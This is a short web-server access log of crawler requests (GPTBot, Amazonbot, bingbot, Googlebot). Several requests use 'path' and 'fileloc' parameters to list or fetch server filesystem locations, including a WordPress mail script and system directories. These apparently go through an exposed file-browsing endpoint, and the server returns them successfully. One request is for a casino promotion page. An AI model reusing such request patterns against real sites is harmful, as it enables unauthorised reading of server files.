74.7.227.59 - - [01/Nov/2025:08:49:15 -0400] "GET /q-~70ncxaXXi0qOvn5iGJymlrkAqDstmC3P19387/ HTTP/1.1" 200 4156 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.0.218.219 - - [01/Nov/2025:08:49:16 -0400] "GET /main/?path=//usr/share/locale/srn HTTP/1.1" 200 3335 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.59 - - [01/Nov/2025:08:49:20 -0400] "GET /q-~69kkulI37RxTWKmXVGZUcYmotsu3jfyR27050/?fileloc=/home/creaqbdc/public_html/wp-mail.php&path=/home/creaqbdc/public_html HTTP/1.1" 200 5590 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.166.126.132 - - [01/Nov/2025:08:49:20 -0400] "GET /beste-versorger-provision/?fileloc=//lib/firmware/radeon/RV770_pfp.bin&path=//lib/firmware/radeon HTTP/1.1" 200 2963 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
40.77.167.123 - - [01/Nov/2025:08:49:24 -0400] "GET /items/643691947.htm HTTP/1.1" 200 17 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.65.197 - - [01/Nov/2025:08:49:24 -0400] "GET /120-free-spins-online-casino-promotion/ HTTP/1.1" 200 20178 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
34.231.156.59 - - [01/Nov/2025:08:49:24 -0400] "GET /beste-versorger-provision/?path=//opt/cloudlinux/venv/lib64/python3.11/site-packages/pyparsing/diagram/__pycache__ HTTP/1.1" 200 3467 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
